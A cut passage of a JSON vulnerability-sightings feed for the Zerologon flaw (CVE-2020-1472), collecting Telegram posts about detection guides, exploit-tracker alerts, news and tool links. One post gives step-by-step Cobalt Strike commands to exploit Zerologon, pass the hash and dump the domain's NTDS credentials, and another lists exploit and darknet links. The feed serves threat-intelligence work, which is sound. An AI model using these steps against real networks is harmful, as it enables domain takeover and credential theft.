\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u044b \u0432 \u043f\u0435\u0440\u0432\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2025 \u0433\u043e\u0434\u0430 \u0440\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u041b\u041a \u0432\u044b\u0434\u0435\u043b\u0438\u043b\u0438: \n\n- ZDI-CAN-25373: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u044f \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 lnk-\u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u041e\u0421 Windows;\n\n- CVE-2025-21333: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0431\u0443\u0444\u0435\u0440\u0430 \u0432 \u043a\u0443\u0447\u0435 \u0432 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0435 vkrnlintvsp.sys;\n\n- CVE-2025-24071: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0442\u0435\u0447\u043a\u0438 NetNTLM-\u0445\u044d\u0448\u0430 \u0432 \u0438\u043d\u0434\u0435\u043a\u0441\u0430\u0442\u043e\u0440\u0435 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b.\n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0430\u044f \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0430 \u0438 \u0438\u043d\u0444\u043e\u0433\u0440\u0430\u0444\u0438\u043a\u0430 - \u0432 \u043e\u0442\u0447\u0435\u0442\u0435.", "creation_timestamp": "2025-06-04T18:00:07.000000Z"}, {"uuid": "fb6705f2-ec9d-4966-8257-fe3bc2a43143", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/YAH_Channel/327", "content": "\u041d\u0430\u043f\u0438\u0441\u0430\u043b\u0438 \u0433\u0430\u0439\u0434 \u043f\u043e \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044e \u0444\u0430\u043a\u0442\u043e\u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u043e\u043f\u0430\u0441\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u043b\u0435\u0442 \u2014 CVE-2020-1472, \u0438\u043b\u0438 Zerologon.\n\n\u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430 \u0434\u0430\u0436\u0435 \u0431\u0435\u0437 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u043a\u0430\u043a\u043e\u0433\u043e-\u043b\u0438\u0431\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430. \u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u0441\u044f \u043a \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u0441\u0435\u0442\u0438.\n\n\u0412 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043c\u044b \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 Zerologon:\n\u25aa\ufe0f\u043f\u043e \u0441\u043e\u0431\u044b\u0442\u0438\u044f\u043c \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432 \u0430\u0443\u0434\u0438\u0442\u0430 Windows;\n\u25aa\ufe0f\u043f\u043e \u0441\u0435\u0442\u0435\u0432\u043e\u043c\u0443 \u0442\u0440\u0430\u0444\u0438\u043a\u0443;\n\u25aa\ufe0f\u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438\u00a0YARA-\u043f\u0440\u0430\u0432\u0438\u043b.\n\n\u0414\u0430\u043d\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043a\u0430\u043a \u043f\u043e \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438, \u0442\u0430\u043a \u0438 \u0432\u043c\u0435\u0441\u0442\u0435, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0444\u0430\u043a\u0442\u044b \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u043e \u0438 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u0441\u043a\u043e\u0440\u043e\u0441\u0442\u044c \u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430.\n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 \u043e \u043a\u0430\u0436\u0434\u043e\u043c \u0438\u0437 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0447\u0438\u0442\u0430\u0439\u0442\u0435 \u0432 \u043d\u0430\u0448\u0435\u043c \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u0435.", "creation_timestamp": "2020-11-03T14:25:29.000000Z"}, {"uuid": "40cd8a35-db2c-48b3-8573-75d4414c3fb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "Telegram/BukL9V416GWTLpIflWe5h5lu1HR9vVf6UKjMPBsKx6eT_Q", "content": "", "creation_timestamp": "2020-10-09T23:40:07.000000Z"}, {"uuid": "cc57b3cf-3f92-41ad-bffa-73d3cee5ca91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/kHAG78X2RtYAPuQ25BOUIrC4WsYU58YO06E33bWQ-2Pwlw", "content": "", "creation_timestamp": "2020-09-16T06:13:02.000000Z"}, {"uuid": "c8c7e240-6a37-4288-88ee-278f02f0b80d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/bizone_channel/148", "content": "\u041d\u0430\u043f\u0438\u0441\u0430\u043b\u0438 \u0433\u0430\u0439\u0434 \u043f\u043e \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044e \u0444\u0430\u043a\u0442\u043e\u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u043e\u043f\u0430\u0441\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u043b\u0435\u0442 \u2014 CVE-2020-1472, \u0438\u043b\u0438 Zerologon.\n\n\u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430 \u0434\u0430\u0436\u0435 \u0431\u0435\u0437 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u043a\u0430\u043a\u043e\u0433\u043e-\u043b\u0438\u0431\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430. \u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u0441\u044f \u043a \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u0441\u0435\u0442\u0438.\n\n\u0412 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043c\u044b \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 Zerologon:\n\u25aa\ufe0f\u043f\u043e \u0441\u043e\u0431\u044b\u0442\u0438\u044f\u043c \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432 \u0430\u0443\u0434\u0438\u0442\u0430 Windows;\n\u25aa\ufe0f\u043f\u043e \u0441\u0435\u0442\u0435\u0432\u043e\u043c\u0443 \u0442\u0440\u0430\u0444\u0438\u043a\u0443;\n\u25aa\ufe0f\u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438\u00a0YARA-\u043f\u0440\u0430\u0432\u0438\u043b.\n\n\u0414\u0430\u043d\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043a\u0430\u043a \u043f\u043e \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438, \u0442\u0430\u043a \u0438 \u0432\u043c\u0435\u0441\u0442\u0435, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0444\u0430\u043a\u0442\u044b \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u043e \u0438 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u0441\u043a\u043e\u0440\u043e\u0441\u0442\u044c \u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430.\n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 \u043e \u043a\u0430\u0436\u0434\u043e\u043c \u0438\u0437 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0447\u0438\u0442\u0430\u0439\u0442\u0435 \u0432 \u043d\u0430\u0448\u0435\u043c \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u0435.", "creation_timestamp": "2020-11-03T14:19:18.000000Z"}, {"uuid": "cfed6de1-9b68-4312-8554-5b2409150762", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/arpsyndicate/895", "content": "#ExploitObserverAlert\n\nCVE-2020-1472\n\nDESCRIPTION: Exploit Observer has 412 entries related to CVE-2020-1472. An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.\n\nFIRST-EPSS: 0.974580000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-12-02T23:44:05.000000Z"}, {"uuid": "227366f7-a791-4b1a-85f0-eedf1b232088", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/arpsyndicate/134", "content": "#ExploitObserverAlert\n\nCVE-2020-1472\n\nDESCRIPTION: Exploit Observer has 406 entries related to CVE-2020-1472. An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.\n\nFIRST-EPSS: 0.974540000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-11-13T00:58:03.000000Z"}, {"uuid": "72e08f53-618b-4cb3-8c88-81cde515017e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3126", "content": "Tools \ud83d\udd27 \ud83d\udd28 \ud83d\udd27 \ud83d\udd28  - Hackers Factory\n\n\u200b\u200bTor / Darknet Links\n\nVerified darknet market and darknet service links on the Tor Network.\n\nhttps://github.com/DarkNetEye/tor-links\n\nWeb:\nhttps://darkneteye.com/\n\n#cybersecurity #infosec #privacy\n\n\u200b\u200bDragondoom\n\nThe PAKE Dragonfly is used as SAE in WPA3 authentication. A critical point during the authentication is when the password needs to be derived into an elliptic curve point.\n\nhttps://gitlab.inria.fr/ddealmei/artifact_dragondoom\n\n#cybersecurity #infosec\n\n\u200b\u200bwhatlicense\n\nFull tool chain to extract WinLicense secrets from a protected program then launch it bypassing all verification steps, utlizing an Intel PIN tool and license file builder.\n\nhttps://github.com/charlesnathansmith/whatlicense\n\n#infosec #pentesting #bugbounty\n\n\u200b\u200bCVE-2022-44875\n\nTesting CVE-2022-44875\n\nhttps://github.com/c0d30d1n/CVE-2022-44875-Test\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bWiFi-OSINT\n\nSome great Wifi, resources, tools and blogs if Wi-Fi #OSINT is your thing.\n\nhttps://github.com/cqcore/WiFi-OSINT\n\n#cybersecurity #infosec #pentesting\n\n\u200b\u200bCVE-2023-35885\n\nCloudpanel 0-day Exploit\n\nhttps://github.com/datackmy/FallingSkies-CVE-2023-35885\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bCVE-2023-3519\n\nThis script is a basic Citrix Scanner for CVE-2023-3519. We try to identify vulnerable Citrix Gateways/ADCs by looking at the HTTP headers.\n\nhttps://github.com/telekom-security/cve-2023-3519-citrix-scanner\n\n#cve #infosec #pentesting\n\n\u200b\u200bvala-vala-hey\n\nThis is a 0day root LPE for latest #Manjaro distro, tested on embedded ARM and x86_64 desktop installs.\n\nhttps://github.com/c-skills/vala-vala-hey\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bCVE-2020-1472\n\nA Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472).\n\nhttps://github.com/SecuraBV/CVE-2020-1472\n\n#cve #cybersecurity #infosec\n\nEX-SQLi\n\nA tool for scanning and exploiting the famous SQL injection vulnerability in more than millions of sites. The exploit was programmed by the TYG team.\n\nhttps://github.com/mr-sami-x/SQLi\n\n#infosec #pentesting #redteam\n\n\u200b\u200bCVE-2023-38632\n\nAsync-sockets-cpp <0.3.1 TCP Packet tcpsocket.hpp Stack-based Overflow\n\nhttps://github.com/Halcy0nic/CVE-2023-38632\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bCVE-2023-3519\n\nThis Nuclei template checks for the presence of the CVE-2023-3519 vulnerability in a target web server.\n\nhttps://github.com/SalehLardhi/CVE-2023-3519\n\n#cybersecurity #infosec #pentesting\n\n\u200b\u200bCVE-2023-28121\n\nWooCommerce Payments: Unauthorized Admin Access #Exploit.\n\nhttps://github.com/gbrsh/CVE-2023-28121\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bVanMoof Encryption Key Exporter\n\nExport all bike details (such as encryption key) of your VanMoof bikes.\n\nhttps://github.com/grossartig/vanmoof-encryption-key-exporter\n\nWeb:\nhttps://keyexporter.grossartig.io/\n\n#cybersecurity #infosec\n\n\u200b\u200bPowershellKerberos\n\nSome scripts to abuse kerberos using Powershell.\n\nhttps://github.com/MzHmO/PowershellKerberos\n\n#infosec #pentesting #redteam\n\nhttps://t.me/dilagrafie", "creation_timestamp": "2023-07-23T12:08:55.000000Z"}, {"uuid": "718df4ae-9852-4eb6-afbc-57c1621763a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/EgyptHackerTeam/451", "content": "Exploiting CVE-2020-1472 Zerologon in Cobalt Strike\n\nDownload the script here\nhttps://github.com/rsmudge/ZeroLogon-BOF\n\nInclude the script as usual, the address is\nZeroLogon-BOF/dist/zerologon.cna\n\nThe console should show a new command - zerologon\n\nApplication:\n\nnet domain - get domain name (e.g. domain.local)\n\nRun the exploit:\nzerologon iunderstand domain.local\n\niunderstand - stop word. By exploiting this vulnerability we reset the password. This exploit can lead to a failure of the domain controller. WE USE IT LAST.\n\nIn case of success we get:\nSuccess! Use pth .\\\\\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync\n\nDo exactly what it says.\npth .\\\\\\%S 31d6cfe0d16ae931b73c59d7e0c089c0\n\nAnd run\ndcsync domain.local\n\nIf everything worked successfully, we get NTDS", "creation_timestamp": "2023-08-07T01:03:46.000000Z"}, {"uuid": "4221f757-4b9d-4c66-8a7e-bbf198f5c2f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/GDSpace/9", "content": "\u200b\u200bTenable.ad. \u0417\u0430\u0449\u0438\u0442\u0430 \u043e\u0442 \u0430\u0442\u0430\u043a \u043d\u0430 Active Directory \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0438\n\nActive Directory, \u0434\u0430\u0436\u0435 \u0435\u0441\u043b\u0438 \u043e\u043d\u0430 \u0432\u0435\u0440\u043d\u043e \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d\u0430, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0438\u0437\u043b\u044e\u0431\u043b\u0435\u043d\u043d\u043e\u0439 \u0446\u0435\u043b\u044c\u044e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0438 \u043b\u0430\u0442\u0435\u0440\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u0432\u0438\u0436\u0435\u043d\u0438\u044f. \u041c\u044b \u043f\u0440\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u043c \u044d\u043c\u0443\u043b\u044f\u0446\u0438\u044e \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a \u043d\u0430 Active Directory, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 Brute Force, DCShadow, DCsync, \u0438 \u0438\u0445 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Tenable.ad. \u041c\u044b \u0442\u0430\u043a\u0436\u0435 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u043e\u0448\u0438\u0431\u043e\u043a \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f\u0445 AD, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a CVE-2020-1472 (\"Zerologon\u201d), \u043e\u0448\u0438\u0431\u043a\u0438 \u0432 \u043f\u0430\u0440\u043e\u043b\u044c\u043d\u044b\u0445 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0430\u0445, \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0423\u0417, \u0438\u0437-\u043f\u043e\u0434 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u044b \u0441\u0435\u0440\u0432\u0438\u0441\u044b Kerberos, \u0438 \u0434\u0440.\n\n#GDS\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b\u0413\u043e\u0432\u043e\u0440\u044f\u0442\u00a0#GlobalDigitalSpace \ud83d\ude80", "creation_timestamp": "2022-06-02T21:43:31.000000Z"}, {"uuid": "ad79f10c-862a-431c-9a8c-4098f911c6cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/arpsyndicate/1448", "content": "#ExploitObserverAlert\n\nCVE-2020-1472\n\nDESCRIPTION: Exploit Observer has 414 entries related to CVE-2020-1472. An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.\n\nFIRST-EPSS: 0.974580000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-12-05T09:54:43.000000Z"}, {"uuid": "e085d1a1-d4ff-428a-840c-439b186559a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/DSUpJzd535KWvozjCvixS0aCLxmEfW4QzhCQOssR_q3Zo9k", "content": "", "creation_timestamp": "2025-03-07T10:00:06.000000Z"}, {"uuid": "3f9038d6-98cf-42d4-8a10-f4560855d4a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/reconshell/359", "content": "CVE-2020-1472 - Zerologon Exploit POC\n\n#Zerologon #Exploit #CVE-2020-1472 #CyberSecurity #DataCenterHack #RedTeam\n\nhttps://reconshell.com/cve-2020-1472-zerologon-exploit-poc/", "creation_timestamp": "2021-01-24T20:35:03.000000Z"}, {"uuid": "6e247f6d-77c1-4886-900f-0442601132f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "Telegram/t56b3Q9Pzy6RNlSuP7aXlCGnrtD_6yp__frASOXq_ro", "content": "", "creation_timestamp": "2021-10-08T16:50:48.000000Z"}, {"uuid": "21f3d5cc-4d7e-44cd-a2b1-a1f800c5c2a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/true_secator/941", "content": "\u200b\u200b\u0415\u0441\u043b\u0438 \u0443 \u0432\u0430\u0441 \u0435\u0449\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u0438\u0439 \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0430\u0432\u0433\u0443\u0441\u0442\u043e\u0432\u0441\u043a\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043e\u0442 Microsoft, \u0447\u0442\u043e\u0431\u044b \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2020-1472 aka Zerologon \u0432 Windows Server, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0445\u0430\u043a\u0435\u0440\u0443 \u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430  \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0432 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043e\u0434\u043d\u043e\u043c\u0443 \u0438\u0437 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0445 \u0445\u043e\u0441\u0442\u043e\u0432, \u0442\u043e \u0432\u043e\u0442 \u0435\u0449\u0435 \u043e\u0434\u0438\u043d \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442.\n\n\u0411\u0435\u043d\u0434\u0436\u0430\u043c\u0438\u043d \u0414\u0435\u043b\u043f\u0438, \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044c \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438 Mimikatz, \u043b\u0435\u0433\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438\u0437 Windows, \u043a\u043e\u0442\u043e\u0440\u044b\u0439, \u043f\u043e \u0438\u0440\u043e\u043d\u0438\u0438 \u0441\u0443\u0434\u044c\u0431\u044b, \u0441\u0442\u0430\u043b \u043e\u0434\u043d\u0438\u043c \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438, \u0441\u043e\u043e\u0431\u0449\u0438\u043b, \u0447\u0442\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0442\u043e 